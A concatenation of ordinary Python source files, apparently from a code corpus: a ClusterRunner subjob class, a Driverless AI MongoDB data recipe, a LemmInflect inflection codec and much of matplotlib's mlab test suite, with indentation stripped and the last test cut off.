class Subjob(object):
def __init__(self, build_id, subjob_id, project_type, job_config, atoms):
"""
:param build_id:
:type build_id: int
:param subjob_id:
:type subjob_id: int
:param project_type:
:type project_type: ProjectType
:param job_config: the job's configuration from clusterrunner.yaml
:type job_config: JobConfig
:param atoms: the atom project_type strings
:type atoms: list[app.master.atom.Atom]
:return:
"""
self._logger = get_logger(__name__)
self._build_id = build_id
self._subjob_id = subjob_id
self._project_type = project_type # todo: Unused; remove.
self.job_config = job_config
self._atoms = atoms
self._set_atoms_subjob_id(atoms, subjob_id)
self._set_atom_state(AtomState.NOT_STARTED)
self.timings = {} # a dict, atom_ids are the keys and seconds are the values
self.slave = None # The slave that had been assigned this subjob. Is None if not started.
def __str__(self):
return '<subjob {} of build {}>'.format(self._subjob_id, self._build_id)
def _set_atoms_subjob_id(self, atoms, subjob_id):
"""
Set the subjob_id on each atom
:param atoms: an array of atoms to set the subjob_id on
:type atoms: list[app.master.atom.Atom]
:param subjob_id: the subjob_id to set on the atoms
:type subjob_id: int
"""
for atom in atoms:
atom.subjob_id = subjob_id
def _set_atom_state(self, state):
"""
Set the state of all atoms of the subjob.
:param state: up-to-date state of all atoms of the subjob
:type state: `:class:AtomState`
"""
for atom in self._atoms:
atom.state = state
def mark_in_progress(self, slave):
"""
Mark the subjob IN_PROGRESS, which marks the state of all the atoms of the subjob IN_PROGRESS.
:param slave: the slave node that has been assigned this subjob.
:type slave: Slave
"""
self._set_atom_state(AtomState.IN_PROGRESS)
self.slave = slave
def mark_completed(self):
"""
Mark the subjob COMPLETED, which marks the state of all the atoms of the subjob COMPLETED.
"""
self._set_atom_state(AtomState.COMPLETED)
def api_representation(self):
"""
:rtype: dict [str, str]
"""
return {
'id': self._subjob_id,
'command': self.job_config.command,
'atoms': [atom.api_representation() for atom in self._atoms],
'slave': self.slave.url if self.slave else None,
}
@property
def atoms(self) -> List['Atom']:
"""
Returns a list of all atoms for this subjob
"""
return self._atoms
def get_atoms(self, offset: int=None, limit: int=None) -> List['Atom']:
"""
Returns a list of atoms for this subjob
:param offset: The starting index of the requested build
:param limit: The number of builds requested
:rtype: list[app.master.atom.Atom]
"""
num_atoms = len(self._atoms)
start, end = get_paginated_indices(offset, limit, num_atoms)
return self._atoms[start:end]
def build_id(self):
"""
:return:
:rtype: int
"""
return self._build_id
def subjob_id(self):
"""
:return:
:rtype: int
"""
return self._subjob_id
def atomic_commands(self):
"""
The list of atom commands -- the atom id for each atom is implicitly defined by the index of the list.
:rtype: list[str]
"""
job_command = self.job_config.command
return ['{} {}'.format(atom.command_string, job_command) for atom in self._atoms]
def add_timings(self, timings):
"""
Add timing data for this subjob's atoms, collected from a slave
:param timings:
:type timings: dict [string, float]
"""
self.timings.update(timings)
def read_timings(self):
"""
The timing data for each atom should be stored in the atom directory. Parse them, associate
them with their atoms, and return them.
:rtype: dict [str, float]
"""
timings = {}
for atom_id, atom in enumerate(self._atoms):
artifact_dir = BuildArtifact.atom_artifact_directory(
self.build_id(),
self.subjob_id(),
atom_id,
result_root=Configuration['results_directory']
)
timings_file_path = os.path.join(artifact_dir, BuildArtifact.TIMING_FILE)
if os.path.exists(timings_file_path):
with open(timings_file_path, 'r') as f:
atom.actual_time = float(f.readline())
timings[atom.command_string] = atom.actual_time
else:
self._logger.warning('No timing data for subjob {} atom {}.',
self._subjob_id, atom_id)
if len(timings) == 0:
self._logger.warning('No timing data for subjob {}.', self._subjob_id)
return timings
|
data/databases/create_dataset_from_mongodb_collection.py
|
james94/driverlessai-recipes
| 194 |
129527
|
"""Create dataset from MonogDB"""
# Author: <NAME>
# Created: 31/01/2020
# Last Updated: 20/02/2020
import datatable as dt
import pandas as pd
from h2oaicore.data import CustomData
_global_modules_needed_by_name = ["pymongo", "dnspython"]
# Please fill before usage
# Note that this information is logged in Driverless AI logs.
MONGO_CONNECTION_STRING = "mongodb+srv://<username>:<password>@host[/[database][?options]]"
MONGO_DB = "sample_mflix"
MONGO_COLLECTION = "theaters"
DATASET_NAME = "sample_mflix.theaters"
class MongoDbData(CustomData):
_modules_needed_by_name = ["pymongo", "dnspython"]
@staticmethod
def create_data(X: dt.Frame = None):
from pymongo import MongoClient
# Note: adding try clause to help pass tests internally.
# can cause unexpected effect of recipe completing successfully but returning an empty dataset.
try:
# Initialize MongoDB python client
client = MongoClient(MONGO_CONNECTION_STRING)
# Use MongoDB python client to obtain list of all documents in a specific database + collection
db = client.get_database(MONGO_DB)
coll = db.get_collection(MONGO_COLLECTION)
docs = coll.find()
# Convert MongoDB documents cursor to pandas dataframe
df = pd.DataFrame.from_dict(docs)
# Cast all object columns as string since datatable cannot accept arbitrary objects
object_cols = df.select_dtypes(include=['object']).columns
df[object_cols] = df[object_cols].astype(str)
# return dict where key is name of dataset and value is a datatable Frame of the data.
return {DATASET_NAME: dt.Frame(df)}
except Exception as e:
return []
|
lemminflect/codecs/InflectionLUCodec.py
|
danielplatt/LemmInflect
| 157 |
129534
|
<filename>lemminflect/codecs/InflectionLUCodec.py
import gzip
from ..slexicon.SKey import *
# Helper class for reading/writing lookup csv file
class InflectionLUCodec(object):
# SPECIALIST LEXICON keys, used for writing
# This represents the order of the forms written to lu.csv is SLexicon key terms
slex_dict = {}
slex_dict[SKey.NOUN] = [SKey.PLURAL]
slex_dict[SKey.ADJ] = [SKey.COMPARATIVE, SKey.SUPERLATIVE]
slex_dict[SKey.ADV] = [SKey.COMPARATIVE, SKey.SUPERLATIVE]
slex_dict[SKey.VERB] = [SKey.PAST, SKey.PAST_PART, SKey.PRES_PART, SKey.THIRD_PRES]
#slex_dict[SKey.AUX] = [SKey.PAST, SKey.PAST_PART, SKey.PRES_PART, SKey.THIRD_PRES]
#slex_dict[SKey.MODAL] = [SKey.PAST]
# Penn treebank tags, used for reading.
# This represents the order of forms read from lu.csv in Penn tag terms
penn_dict = {}
penn_dict[SKey.NOUN] = ['NNS'] # base is SINGULAR = NN
penn_dict[SKey.ADJ] = ['JJR', 'JJS'] # base is POSITIVE = JJ
penn_dict[SKey.ADV] = ['RBR', 'RBS'] # base is POSITIVE = RB
penn_dict[SKey.VERB] = ['VBD', 'VBN', 'VBG', 'VBZ'] # base is INFINATIVE = VB, VBP
#penn_dict[SKey.AUX] = ['VBD', 'VBN', 'VBG', 'VBZ'] # will be overridden below
#penn_dict[SKey.MODAL] = ['VBD'] # will be overridden below
@classmethod
def toString(cls, word, category, forms_dict):
forms_str = ''
for ftype in cls.slex_dict[category]:
for spelling in forms_dict.get(ftype,[]):
forms_str += '%s/' % spelling
if forms_str.endswith('/'):
forms_str = forms_str[:-1]
forms_str += ','
if forms_str.endswith(','):
forms_str = forms_str[:-1]
line = '%s,%s,%s\n' % (word, category, forms_str)
return line
@classmethod
def fromString(cls, line):
parts = line.strip().split(',')
word = parts[0]
category = parts[1]
forms = parts[2:]
forms_dict = {}
for i, ftype in enumerate(cls.penn_dict[category]):
if i < len(forms):
spellings = tuple(forms[i].split('/'))
if len(spellings)>1 or spellings[0]: # empty produces ('',)
forms_dict[ftype] = spellings
# update for base forms
if category == SKey.NOUN:
forms_dict['NN'] = (word,)
elif category == SKey.ADJ:
forms_dict['JJ'] = (word,)
elif category == SKey.ADV:
forms_dict['RB'] = (word,)
elif category in [SKey.VERB]:
forms_dict['VB'] = (word,)
forms_dict['VBP'] = (word,)
# Don't read aux and modal from the look-up. Get them later
elif category in [SKey.AUX, SKey.MODAL]:
forms_dict['VB'] = (word,)
else:
raise ValueError('Unrecognized category: %s' % category)
return word, category, forms_dict
# Load inflections_lu.csv
@classmethod
def load(cls, fn):
infl_dict = {}
with gzip.open(fn, 'rb') as f:
for line in f:
line = line.decode()
word, _, forms_dict = cls.fromString(line)
if word not in infl_dict:
infl_dict[word] = forms_dict
else:
infl_dict[word].update(forms_dict)
# Update the dictionary with hard-coded values for aux and modals.
infl_dict = cls.updateForAuxMod(infl_dict)
return infl_dict
# On reading, hard-code aux/modals since the don't follow the rules very well
# This will override any previously read in values
@staticmethod
def updateForAuxMod(d):
# Modal auxillary verbs
d['can'] = {'VB':('can',), 'VBD':('could',)}
d['may'] = {'VB':('may',), 'VBD':('might',)}
d['will'] = {'VB':('will',), 'VBD':('would',)}
d['shall'] = {'VB':('shall',), 'VBD':('should',)}
d['must'] = {'VB':('must',), 'VBD':('must',)}
d['ought'] = {'VB':('ought',), 'VBD':('ought',)}
d['dare'] = {'VB':('dare',)}
# Auxillaries verbs
d['be'] = {'VB':('be',), 'VBD':('was', 'were'), 'VBG':('being',), 'VBN':('been',),
'VBP':('am', 'are'), 'VBZ':('is',)}
return d
|
venv/Lib/site-packages/matplotlib/tests/test_mlab.py
|
AdarshSai/Final_project
| 353 |
129542
|
from numpy.testing import (assert_allclose, assert_almost_equal,
assert_array_equal, assert_array_almost_equal_nulp)
import numpy as np
import pytest
import matplotlib.mlab as mlab
from matplotlib.cbook.deprecation import MatplotlibDeprecationWarning
def _stride_repeat(*args, **kwargs):
with pytest.warns(MatplotlibDeprecationWarning):
return mlab.stride_repeat(*args, **kwargs)
class TestStride:
def get_base(self, x):
y = x
while y.base is not None:
y = y.base
return y
def calc_window_target(self, x, NFFT, noverlap=0, axis=0):
"""
This is an adaptation of the original window extraction algorithm.
This is here to test to make sure the new implementation has the same
result.
"""
step = NFFT - noverlap
ind = np.arange(0, len(x) - NFFT + 1, step)
n = len(ind)
result = np.zeros((NFFT, n))
# do the ffts of the slices
for i in range(n):
result[:, i] = x[ind[i]:ind[i]+NFFT]
if axis == 1:
result = result.T
return result
@pytest.mark.parametrize('shape', [(), (10, 1)], ids=['0D', '2D'])
def test_stride_windows_invalid_input_shape(self, shape):
x = np.arange(np.prod(shape)).reshape(shape)
with pytest.raises(ValueError):
mlab.stride_windows(x, 5)
@pytest.mark.parametrize('n, noverlap',
[(0, None), (11, None), (2, 2), (2, 3)],
ids=['n less than 1', 'n greater than input',
'noverlap greater than n',
'noverlap equal to n'])
def test_stride_windows_invalid_params(self, n, noverlap):
x = np.arange(10)
with pytest.raises(ValueError):
mlab.stride_windows(x, n, noverlap)
@pytest.mark.parametrize('shape', [(), (10, 1)], ids=['0D', '2D'])
def test_stride_repeat_invalid_input_shape(self, shape):
x = np.arange(np.prod(shape)).reshape(shape)
with pytest.raises(ValueError):
_stride_repeat(x, 5)
@pytest.mark.parametrize('axis', [-1, 2],
ids=['axis less than 0',
'axis greater than input shape'])
def test_stride_repeat_invalid_axis(self, axis):
x = np.array(0)
with pytest.raises(ValueError):
_stride_repeat(x, 5, axis=axis)
def test_stride_repeat_n_lt_1_ValueError(self):
x = np.arange(10)
with pytest.raises(ValueError):
_stride_repeat(x, 0)
@pytest.mark.parametrize('axis', [0, 1], ids=['axis0', 'axis1'])
@pytest.mark.parametrize('n', [1, 5], ids=['n1', 'n5'])
def test_stride_repeat(self, n, axis):
x = np.arange(10)
y = _stride_repeat(x, n, axis=axis)
expected_shape = [10, 10]
expected_shape[axis] = n
yr = np.repeat(np.expand_dims(x, axis), n, axis=axis)
assert yr.shape == y.shape
assert_array_equal(yr, y)
assert tuple(expected_shape) == y.shape
assert self.get_base(y) is x
@pytest.mark.parametrize('axis', [0, 1], ids=['axis0', 'axis1'])
@pytest.mark.parametrize('n, noverlap',
[(1, 0), (5, 0), (15, 2), (13, -3)],
ids=['n1-noverlap0', 'n5-noverlap0',
'n15-noverlap2', 'n13-noverlapn3'])
def test_stride_windows(self, n, noverlap, axis):
x = np.arange(100)
y = mlab.stride_windows(x, n, noverlap=noverlap, axis=axis)
expected_shape = [0, 0]
expected_shape[axis] = n
expected_shape[1 - axis] = 100 // (n - noverlap)
yt = self.calc_window_target(x, n, noverlap=noverlap, axis=axis)
assert yt.shape == y.shape
assert_array_equal(yt, y)
assert tuple(expected_shape) == y.shape
assert self.get_base(y) is x
@pytest.mark.parametrize('axis', [0, 1], ids=['axis0', 'axis1'])
def test_stride_windows_n32_noverlap0_unflatten(self, axis):
n = 32
x = np.arange(n)[np.newaxis]
x1 = np.tile(x, (21, 1))
x2 = x1.flatten()
y = mlab.stride_windows(x2, n, axis=axis)
if axis == 0:
x1 = x1.T
assert y.shape == x1.shape
assert_array_equal(y, x1)
def test_stride_ensure_integer_type(self):
N = 100
x = np.full(N + 20, np.nan)
y = x[10:-10]
y[:] = 0.3
# previous to #3845 lead to corrupt access
y_strided = mlab.stride_windows(y, n=33, noverlap=0.6)
assert_array_equal(y_strided, 0.3)
# previous to #3845 lead to corrupt access
y_strided = mlab.stride_windows(y, n=33.3, noverlap=0)
assert_array_equal(y_strided, 0.3)
# even previous to #3845 could not find any problematic
# configuration however, let's be sure it's not accidentally
# introduced
y_strided = _stride_repeat(y, n=33.815)
assert_array_equal(y_strided, 0.3)
def _apply_window(*args, **kwargs):
with pytest.warns(MatplotlibDeprecationWarning):
return mlab.apply_window(*args, **kwargs)
class TestWindow:
def setup(self):
np.random.seed(0)
n = 1000
self.sig_rand = np.random.standard_normal(n) + 100.
self.sig_ones = np.ones(n)
def check_window_apply_repeat(self, x, window, NFFT, noverlap):
"""
This is an adaptation of the original window application algorithm.
This is here to test to make sure the new implementation has the same
result.
"""
step = NFFT - noverlap
ind = np.arange(0, len(x) - NFFT + 1, step)
n = len(ind)
result = np.zeros((NFFT, n))
if np.iterable(window):
windowVals = window
else:
windowVals = window(np.ones(NFFT, x.dtype))
# do the ffts of the slices
for i in range(n):
result[:, i] = windowVals * x[ind[i]:ind[i]+NFFT]
return result
def test_window_none_rand(self):
res = mlab.window_none(self.sig_ones)
assert_array_equal(res, self.sig_ones)
def test_window_none_ones(self):
res = mlab.window_none(self.sig_rand)
assert_array_equal(res, self.sig_rand)
def test_window_hanning_rand(self):
targ = np.hanning(len(self.sig_rand)) * self.sig_rand
res = mlab.window_hanning(self.sig_rand)
assert_allclose(targ, res, atol=1e-06)
def test_window_hanning_ones(self):
targ = np.hanning(len(self.sig_ones))
res = mlab.window_hanning(self.sig_ones)
assert_allclose(targ, res, atol=1e-06)
def test_apply_window_1D_axis1_ValueError(self):
x = self.sig_rand
window = mlab.window_hanning
with pytest.raises(ValueError):
_apply_window(x, window, axis=1, return_window=False)
def test_apply_window_1D_els_wrongsize_ValueError(self):
x = self.sig_rand
window = mlab.window_hanning(np.ones(x.shape[0]-1))
with pytest.raises(ValueError):
_apply_window(x, window)
def test_apply_window_0D_ValueError(self):
x = np.array(0)
window = mlab.window_hanning
with pytest.raises(ValueError):
_apply_window(x, window, axis=1, return_window=False)
def test_apply_window_3D_ValueError(self):
x = self.sig_rand[np.newaxis][np.newaxis]
window = mlab.window_hanning
with pytest.raises(ValueError):
_apply_window(x, window, axis=1, return_window=False)
def test_apply_window_hanning_1D(self):
x = self.sig_rand
window = mlab.window_hanning
window1 = mlab.window_hanning(np.ones(x.shape[0]))
y, window2 = _apply_window(x, window, return_window=True)
yt = window(x)
assert yt.shape == y.shape
assert x.shape == y.shape
assert_allclose(yt, y, atol=1e-06)
assert_array_equal(window1, window2)
def test_apply_window_hanning_1D_axis0(self):
x = self.sig_rand
window = mlab.window_hanning
y = _apply_window(x, window, axis=0, return_window=False)
yt = window(x)
assert yt.shape == y.shape
assert x.shape == y.shape
assert_allclose(yt, y, atol=1e-06)
def test_apply_window_hanning_els_1D_axis0(self):
x = self.sig_rand
window = mlab.window_hanning(np.ones(x.shape[0]))
window1 = mlab.window_hanning
y = _apply_window(x, window, axis=0, return_window=False)
yt = window1(x)
assert yt.shape == y.shape
assert x.shape == y.shape
assert_allclose(yt, y, atol=1e-06)
def test_apply_window_hanning_2D_axis0(self):
x = np.random.standard_normal([1000, 10]) + 100.
window = mlab.window_hanning
y = _apply_window(x, window, axis=0, return_window=False)
yt = np.zeros_like(x)
for i in range(x.shape[1]):
yt[:, i] = window(x[:, i])
assert yt.shape == y.shape
assert x.shape == y.shape
assert_allclose(yt, y, atol=1e-06)
def test_apply_window_hanning_els1_2D_axis0(self):
x = np.random.standard_normal([1000, 10]) + 100.
window = mlab.window_hanning(np.ones(x.shape[0]))
window1 = mlab.window_hanning
y = _apply_window(x, window, axis=0, return_window=False)
yt = np.zeros_like(x)
for i in range(x.shape[1]):
yt[:, i] = window1(x[:, i])
assert yt.shape == y.shape
assert x.shape == y.shape
assert_allclose(yt, y, atol=1e-06)
def test_apply_window_hanning_els2_2D_axis0(self):
x = np.random.standard_normal([1000, 10]) + 100.
window = mlab.window_hanning
window1 = mlab.window_hanning(np.ones(x.shape[0]))
y, window2 = _apply_window(x, window, axis=0, return_window=True)
yt = np.zeros_like(x)
for i in range(x.shape[1]):
yt[:, i] = window1*x[:, i]
assert yt.shape == y.shape
assert x.shape == y.shape
assert_allclose(yt, y, atol=1e-06)
assert_array_equal(window1, window2)
def test_apply_window_hanning_els3_2D_axis0(self):
x = np.random.standard_normal([1000, 10]) + 100.
window = mlab.window_hanning
window1 = mlab.window_hanning(np.ones(x.shape[0]))
y, window2 = _apply_window(x, window, axis=0, return_window=True)
yt = _apply_window(x, window1, axis=0, return_window=False)
assert yt.shape == y.shape
assert x.shape == y.shape
assert_allclose(yt, y, atol=1e-06)
assert_array_equal(window1, window2)
def test_apply_window_hanning_2D_axis1(self):
x = np.random.standard_normal([10, 1000]) + 100.
window = mlab.window_hanning
y = _apply_window(x, window, axis=1, return_window=False)
yt = np.zeros_like(x)
for i in range(x.shape[0]):
yt[i, :] = window(x[i, :])
assert yt.shape == y.shape
assert x.shape == y.shape
assert_allclose(yt, y, atol=1e-06)
def test_apply_window_hanning_2D_els1_axis1(self):
x = np.random.standard_normal([10, 1000]) + 100.
window = mlab.window_hanning(np.ones(x.shape[1]))
window1 = mlab.window_hanning
y = _apply_window(x, window, axis=1, return_window=False)
yt = np.zeros_like(x)
for i in range(x.shape[0]):
yt[i, :] = window1(x[i, :])
assert yt.shape == y.shape
assert x.shape == y.shape
assert_allclose(yt, y, atol=1e-06)
def test_apply_window_hanning_2D_els2_axis1(self):
x = np.random.standard_normal([10, 1000]) + 100.
window = mlab.window_hanning
window1 = mlab.window_hanning(np.ones(x.shape[1]))
y, window2 = _apply_window(x, window, axis=1, return_window=True)
yt = np.zeros_like(x)
for i in range(x.shape[0]):
yt[i, :] = window1 * x[i, :]
assert yt.shape == y.shape
assert x.shape == y.shape
assert_allclose(yt, y, atol=1e-06)
assert_array_equal(window1, window2)
def test_apply_window_hanning_2D_els3_axis1(self):
x = np.random.standard_normal([10, 1000]) + 100.
window = mlab.window_hanning
window1 = mlab.window_hanning(np.ones(x.shape[1]))
y = _apply_window(x, window, axis=1, return_window=False)
yt = _apply_window(x, window1, axis=1, return_window=False)
assert yt.shape == y.shape
assert x.shape == y.shape
assert_allclose(yt, y, atol=1e-06)
def test_apply_window_stride_windows_hanning_2D_n13_noverlapn3_axis0(self):
x = self.sig_rand
window = mlab.window_hanning
yi = mlab.stride_windows(x, n=13, noverlap=2, axis=0)
y = _apply_window(yi, window, axis=0, return_window=False)
yt = self.check_window_apply_repeat(x, window, 13, 2)
assert yt.shape == y.shape
assert x.shape != y.shape
assert_allclose(yt, y, atol=1e-06)
def test_apply_window_hanning_2D_stack_axis1(self):
ydata = np.arange(32)
ydata1 = ydata+5
ydata2 = ydata+3.3
ycontrol1 = _apply_window(ydata1, mlab.window_hanning)
ycontrol2 = mlab.window_hanning(ydata2)
ydata = np.vstack([ydata1, ydata2])
ycontrol = np.vstack([ycontrol1, ycontrol2])
ydata = np.tile(ydata, (20, 1))
ycontrol = np.tile(ycontrol, (20, 1))
result = _apply_window(ydata, mlab.window_hanning, axis=1,
return_window=False)
assert_allclose(ycontrol, result, atol=1e-08)
def test_apply_window_hanning_2D_stack_windows_axis1(self):
ydata = np.arange(32)
ydata1 = ydata+5
ydata2 = ydata+3.3
ycontrol1 = _apply_window(ydata1, mlab.window_hanning)
ycontrol2 = mlab.window_hanning(ydata2)
ydata = np.vstack([ydata1, ydata2])
ycontrol = np.vstack([ycontrol1, ycontrol2])
ydata = np.tile(ydata, (20, 1))
ycontrol = np.tile(ycontrol, (20, 1))
result = _apply_window(ydata, mlab.window_hanning, axis=1,
return_window=False)
assert_allclose(ycontrol, result, atol=1e-08)
def test_apply_window_hanning_2D_stack_windows_axis1_unflatten(self):
n = 32
ydata = np.arange(n)
ydata1 = ydata+5
ydata2 = ydata+3.3
ycontrol1 = _apply_window(ydata1, mlab.window_hanning)
ycontrol2 = mlab.window_hanning(ydata2)
ydata = np.vstack([ydata1, ydata2])
ycontrol = np.vstack([ycontrol1, ycontrol2])
ydata = np.tile(ydata, (20, 1))
ycontrol = np.tile(ycontrol, (20, 1))
ydata = ydata.flatten()
ydata1 = mlab.stride_windows(ydata, 32, noverlap=0, axis=0)
result = _apply_window(ydata1, mlab.window_hanning, axis=0,
return_window=False)
assert_allclose(ycontrol.T, result, atol=1e-08)
class TestDetrend:
def setup(self):
np.random.seed(0)
n = 1000
x = np.linspace(0., 100, n)
self.sig_zeros = np.zeros(n)
self.sig_off = self.sig_zeros + 100.
self.sig_slope = np.linspace(-10., 90., n)
self.sig_slope_mean = x - x.mean()
sig_rand = np.random.standard_normal(n)
sig_sin = np.sin(x*2*np.pi/(n/100))
sig_rand -= sig_rand.mean()
sig_sin -= sig_sin.mean()
self.sig_base = sig_rand + sig_sin
self.atol = 1e-08
def test_detrend_none_0D_zeros(self):
input = 0.
targ = input
mlab.detrend_none(input)
assert input == targ
def test_detrend_none_0D_zeros_axis1(self):
input = 0.
targ = input
mlab.detrend_none(input, axis=1)
assert input == targ
def test_detrend_str_none_0D_zeros(self):
input = 0.
targ = input
mlab.detrend(input, key='none')
assert input == targ
def test_detrend_detrend_none_0D_zeros(self):
input = 0.
targ = input
mlab.detrend(input, key=mlab.detrend_none)
assert input == targ
def test_detrend_none_0D_off(self):
input = 5.5
targ = input
mlab.detrend_none(input)
assert input == targ
def test_detrend_none_1D_off(self):
input = self.sig_off
targ = input
res = mlab.detrend_none(input)
assert_array_equal(res, targ)
def test_detrend_none_1D_slope(self):
input = self.sig_slope
targ = input
res = mlab.detrend_none(input)
assert_array_equal(res, targ)
def test_detrend_none_1D_base(self):
input = self.sig_base
targ = input
res = mlab.detrend_none(input)
assert_array_equal(res, targ)
def test_detrend_none_1D_base_slope_off_list(self):
input = self.sig_base + self.sig_slope + self.sig_off
targ = input.tolist()
res = mlab.detrend_none(input.tolist())
assert res == targ
def test_detrend_none_2D(self):
arri = [self.sig_base,
self.sig_base + self.sig_off,
self.sig_base + self.sig_slope,
self.sig_base + self.sig_off + self.sig_slope]
input = np.vstack(arri)
targ = input
res = mlab.detrend_none(input)
assert_array_equal(res, targ)
def test_detrend_none_2D_T(self):
arri = [self.sig_base,
self.sig_base + self.sig_off,
self.sig_base + self.sig_slope,
self.sig_base + self.sig_off + self.sig_slope]
input = np.vstack(arri)
targ = input
res = mlab.detrend_none(input.T)
assert_array_equal(res.T, targ)
def test_detrend_mean_0D_zeros(self):
input = 0.
targ = 0.
res = mlab.detrend_mean(input)
assert_almost_equal(res, targ)
def test_detrend_str_mean_0D_zeros(self):
input = 0.
targ = 0.
res = mlab.detrend(input, key='mean')
assert_almost_equal(res, targ)
def test_detrend_detrend_mean_0D_zeros(self):
input = 0.
targ = 0.
res = mlab.detrend(input, key=mlab.detrend_mean)
assert_almost_equal(res, targ)
def test_detrend_mean_0D_off(self):
input = 5.5
targ = 0.
res = mlab.detrend_mean(input)
assert_almost_equal(res, targ)
def test_detrend_str_mean_0D_off(self):
input = 5.5
targ = 0.
res = mlab.detrend(input, key='mean')
assert_almost_equal(res, targ)
def test_detrend_detrend_mean_0D_off(self):
input = 5.5
targ = 0.
res = mlab.detrend(input, key=mlab.detrend_mean)
assert_almost_equal(res, targ)
def test_detrend_mean_1D_zeros(self):
input = self.sig_zeros
targ = self.sig_zeros
res = mlab.detrend_mean(input)
assert_allclose(res, targ, atol=self.atol)
def test_detrend_mean_1D_base(self):
input = self.sig_base
targ = self.sig_base
res = mlab.detrend_mean(input)
assert_allclose(res, targ, atol=self.atol)
def test_detrend_mean_1D_base_off(self):
input = self.sig_base + self.sig_off
targ = self.sig_base
res = mlab.detrend_mean(input)
assert_allclose(res, targ, atol=self.atol)
def test_detrend_mean_1D_base_slope(self):
input = self.sig_base + self.sig_slope
targ = self.sig_base + self.sig_slope_mean
res = mlab.detrend_mean(input)
assert_allclose(res, targ, atol=self.atol)
def test_detrend_mean_1D_base_slope_off(self):
input = self.sig_base + self.sig_slope + self.sig_off
targ = self.sig_base + self.sig_slope_mean
res = mlab.detrend_mean(input)
assert_allclose(res, targ, atol=1e-08)
def test_detrend_mean_1D_base_slope_off_axis0(self):
input = self.sig_base + self.sig_slope + self.sig_off
targ = self.sig_base + self.sig_slope_mean
res = mlab.detrend_mean(input, axis=0)
assert_allclose(res, targ, atol=1e-08)
def test_detrend_mean_1D_base_slope_off_list(self):
input = self.sig_base + self.sig_slope + self.sig_off
targ = self.sig_base + self.sig_slope_mean
res = mlab.detrend_mean(input.tolist())
assert_allclose(res, targ, atol=1e-08)
def test_detrend_mean_1D_base_slope_off_list_axis0(self):
input = self.sig_base + self.sig_slope + self.sig_off
targ = self.sig_base + self.sig_slope_mean
res = mlab.detrend_mean(input.tolist(), axis=0)
assert_allclose(res, targ, atol=1e-08)
def test_detrend_mean_2D_default(self):
arri = [self.sig_off,
self.sig_base + self.sig_off]
arrt = [self.sig_zeros,
self.sig_base]
input = np.vstack(arri)
targ = np.vstack(arrt)
res = mlab.detrend_mean(input)
assert_allclose(res, targ, atol=1e-08)
def test_detrend_mean_2D_none(self):
arri = [self.sig_off,
self.sig_base + self.sig_off]
arrt = [self.sig_zeros,
self.sig_base]
input = np.vstack(arri)
targ = np.vstack(arrt)
res = mlab.detrend_mean(input, axis=None)
assert_allclose(res, targ,
atol=1e-08)
def test_detrend_mean_2D_none_T(self):
arri = [self.sig_off,
self.sig_base + self.sig_off]
arrt = [self.sig_zeros,
self.sig_base]
input = np.vstack(arri).T
targ = np.vstack(arrt)
res = mlab.detrend_mean(input, axis=None)
assert_allclose(res.T, targ,
atol=1e-08)
def test_detrend_mean_2D_axis0(self):
arri = [self.sig_base,
self.sig_base + self.sig_off,
self.sig_base + self.sig_slope,
self.sig_base + self.sig_off + self.sig_slope]
arrt = [self.sig_base,
self.sig_base,
self.sig_base + self.sig_slope_mean,
self.sig_base + self.sig_slope_mean]
input = np.vstack(arri).T
targ = np.vstack(arrt).T
res = mlab.detrend_mean(input, axis=0)
assert_allclose(res, targ,
atol=1e-08)
def test_detrend_mean_2D_axis1(self):
arri = [self.sig_base,
self.sig_base + self.sig_off,
self.sig_base + self.sig_slope,
self.sig_base + self.sig_off + self.sig_slope]
arrt = [self.sig_base,
self.sig_base,
self.sig_base + self.sig_slope_mean,
self.sig_base + self.sig_slope_mean]
input = np.vstack(arri)
targ = np.vstack(arrt)
res = mlab.detrend_mean(input, axis=1)
assert_allclose(res, targ,
atol=1e-08)
def test_detrend_mean_2D_axism1(self):
arri = [self.sig_base,
self.sig_base + self.sig_off,
self.sig_base + self.sig_slope,
self.sig_base + self.sig_off + self.sig_slope]
arrt = [self.sig_base,
self.sig_base,
self.sig_base + self.sig_slope_mean,
self.sig_base + self.sig_slope_mean]
input = np.vstack(arri)
targ = np.vstack(arrt)
res = mlab.detrend_mean(input, axis=-1)
assert_allclose(res, targ,
atol=1e-08)
def test_detrend_2D_default(self):
arri = [self.sig_off,
self.sig_base + self.sig_off]
arrt = [self.sig_zeros,
self.sig_base]
input = np.vstack(arri)
targ = np.vstack(arrt)
res = mlab.detrend(input)
assert_allclose(res, targ, atol=1e-08)
def test_detrend_2D_none(self):
arri = [self.sig_off,
self.sig_base + self.sig_off]
arrt = [self.sig_zeros,
self.sig_base]
input = np.vstack(arri)
targ = np.vstack(arrt)
res = mlab.detrend(input, axis=None)
assert_allclose(res, targ, atol=1e-08)
def test_detrend_str_mean_2D_axis0(self):
arri = [self.sig_base,
self.sig_base + self.sig_off,
self.sig_base + self.sig_slope,
self.sig_base + self.sig_off + self.sig_slope]
arrt = [self.sig_base,
self.sig_base,
self.sig_base + self.sig_slope_mean,
self.sig_base + self.sig_slope_mean]
input = np.vstack(arri).T
targ = np.vstack(arrt).T
res = mlab.detrend(input, key='mean', axis=0)
assert_allclose(res, targ,
atol=1e-08)
def test_detrend_str_constant_2D_none_T(self):
arri = [self.sig_off,
self.sig_base + self.sig_off]
arrt = [self.sig_zeros,
self.sig_base]
input = np.vstack(arri).T
targ = np.vstack(arrt)
res = mlab.detrend(input, key='constant', axis=None)
assert_allclose(res.T, targ,
atol=1e-08)
def test_detrend_str_default_2D_axis1(self):
arri = [self.sig_base,
self.sig_base + self.sig_off,
self.sig_base + self.sig_slope,
self.sig_base + self.sig_off + self.sig_slope]
arrt = [self.sig_base,
self.sig_base,
self.sig_base + self.sig_slope_mean,
self.sig_base + self.sig_slope_mean]
input = np.vstack(arri)
targ = np.vstack(arrt)
res = mlab.detrend(input, key='default', axis=1)
assert_allclose(res, targ,
atol=1e-08)
def test_detrend_detrend_mean_2D_axis0(self):
arri = [self.sig_base,
self.sig_base + self.sig_off,
self.sig_base + self.sig_slope,
self.sig_base + self.sig_off + self.sig_slope]
arrt = [self.sig_base,
self.sig_base,
self.sig_base + self.sig_slope_mean,
self.sig_base + self.sig_slope_mean]
input = np.vstack(arri).T
targ = np.vstack(arrt).T
res = mlab.detrend(input, key=mlab.detrend_mean, axis=0)
assert_allclose(res, targ,
atol=1e-08)
def test_detrend_bad_key_str_ValueError(self):
input = self.sig_slope[np.newaxis]
with pytest.raises(ValueError):
mlab.detrend(input, key='spam')
def test_detrend_bad_key_var_ValueError(self):
input = self.sig_slope[np.newaxis]
with pytest.raises(ValueError):
mlab.detrend(input, key=5)
def test_detrend_mean_0D_d0_ValueError(self):
input = 5.5
